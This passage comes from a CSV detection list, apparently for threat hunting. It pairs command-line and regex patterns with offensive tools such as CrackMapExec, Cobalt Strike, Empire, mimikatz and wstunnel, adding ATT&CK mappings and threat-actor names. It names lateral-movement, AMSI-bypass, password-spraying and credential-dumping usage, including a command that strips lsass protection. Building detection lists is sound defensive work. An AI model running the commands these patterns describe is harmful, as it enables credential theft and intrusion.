tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --wldp-bypass=*",".{0,1000}\s\-\-wldp\-bypass\=.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "* --wmi *SELECT *",".{0,1000}\s\-\-wmi\s.{0,1000}SELECT\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* wmi_exec.exe*",".{0,1000}\swmi_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* wmiexec.py -k -no-pass *",".{0,1000}\swmiexec\.py\s\-k\s\-no\-pass\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "* wmiexec.py*",".{0,1000}\swmiexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --wmi-namespace 'root\cimv2'*",".{0,1000}\s\-\-wmi\-namespace\s\'root\\cimv2\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* wmirun=true dllpath=*.dll* computername=*",".{0,1000}\swmirun\=true\sdllpath\=.{0,1000}\.dll.{0,1000}\scomputername\=.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","75","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" "* -wordlist * -spawnto *",".{0,1000}\s\-wordlist\s.{0,1000}\s\-spawnto\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* --wordlist=*.lst*",".{0,1000}\s\-\-wordlist\=.{0,1000}\.lst.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* -word-list-path * -file-extensions *",".{0,1000}\s\-word\-list\-path\s.{0,1000}\s\-file\-extensions\s.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* -word-list-path tomatch.txt*",".{0,1000}\s\-word\-list\-path\stomatch\.txt.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* -WorkingHours *",".{0,1000}\s\-WorkingHours\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --wpad --lm --ProxyAuth --disable-ess**",".{0,1000}\s\-\-wpad\s\-\-lm\s\-\-ProxyAuth\s\-\-disable\-ess.{0,1000}.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* wraith.py*",".{0,1000}\swraith\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "* wraith-server.py*",".{0,1000}\swraith\-server\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "* wraith-server_v*.py*",".{0,1000}\swraith\-server_v.{0,1000}\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "* WriteToLsass*",".{0,1000}\sWriteToLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "* ws://[::]:*",".{0,1000}\sws\:\/\/\[\:\:\]\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* wsdd-discover.nse*",".{0,1000}\swsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ws-dirs.txt*",".{0,1000}\sws\-dirs\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* ws-files.txt*",".{0,1000}\sws\-files\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* WSPCoerce.cs*",".{0,1000}\sWSPCoerce\.cs.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","216","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "* wss://0.0.0.0:*",".{0,1000}\swss\:\/\/0\.0\.0\.0\:.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* wstunnel.exe*",".{0,1000}\swstunnel\.exe.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* -X '$PSVersionTable' --amsi-bypass *",".{0,1000}\s\-X\s\'\$PSVersionTable\'\s\s\-\-amsi\-bypass\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -X '$PSVersionTable' *",".{0,1000}\s\-X\s\'\$PSVersionTable\'\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -x * --exec-method *",".{0,1000}\s\-x\s.{0,1000}\s\-\-exec\-method\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -X '[System.Environment]::Is64BitProcess'*",".{0,1000}\s\-X\s\'\[System\.Environment\]\:\:Is64BitProcess\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -X FUZZ http*",".{0,1000}\s\-X\sFUZZ\shttp.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* -X whoami --obfs*",".{0,1000}\s\-X\swhoami\s\-\-obfs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -x -z --get-users-list*",".{0,1000}\s\-x\s\-z\s\-\-get\-users\-list.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "* -x -z -s 3 -j 1 -u *.txt*",".{0,1000}\s\-x\s\-z\s\-s\s3\s\-j\s1\s\-u\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "* x11-access.nse*",".{0,1000}\sx11\-access\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xdmcp-discover.nse*",".{0,1000}\sxdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xmlrpc-methods.nse*",".{0,1000}\sxmlrpc\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xmpp-brute.nse*",".{0,1000}\sxmpp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xmpp-info.nse*",".{0,1000}\sxmpp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* xpipe*",".{0,1000}\sxpipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","0","N/A","10","10","78","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "* XRulez.cpp*",".{0,1000}\sXRulez\.cpp.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "* Xworm v*",".{0,1000}XWorm\s(V|v)\d+\.\d+.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "* Your payload has been delivered*",".{0,1000}\sYour\spayload\shas\sbeen\sdelivered.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -z burplog*",".{0,1000}\s\-z\sburplog.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*!! >> if you did this while in the root shell, the terminal will be messed up << !!*",".{0,1000}!!\s\>\>\sif\syou\sdid\sthis\swhile\sin\sthe\sroot\sshell,\sthe\sterminal\swill\sbe\smessed\sup\s\<\<\s!!.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*!!! Are you sure you are running as the AD FS service account?*",".{0,1000}!!!\sAre\syou\ssure\syou\sare\srunning\sas\sthe\sAD\sFS\sservice\saccount\?.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*!autoruns *",".{0,1000}!autoruns\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!files upload *",".{0,1000}!files\supload\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!handlers load *",".{0,1000}!handlers\sload\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!implants *",".{0,1000}!implants\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!interactive *",".{0,1000}!interactive\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!modules load *",".{0,1000}!modules\sload\s.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*!processprotect *lsass.exe*",".{0,1000}!processprotect\s.{0,1000}lsass\.exe.{0,1000}","offensive_tool_keyword","mimikatz","removing process protection for the lsass.exe process can potentially enable adversaries to inject malicious code or manipulate the process to escalate privileges or gather sensitive information such as credentials. command: !processprotect /process:lsass.exe /remove","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - 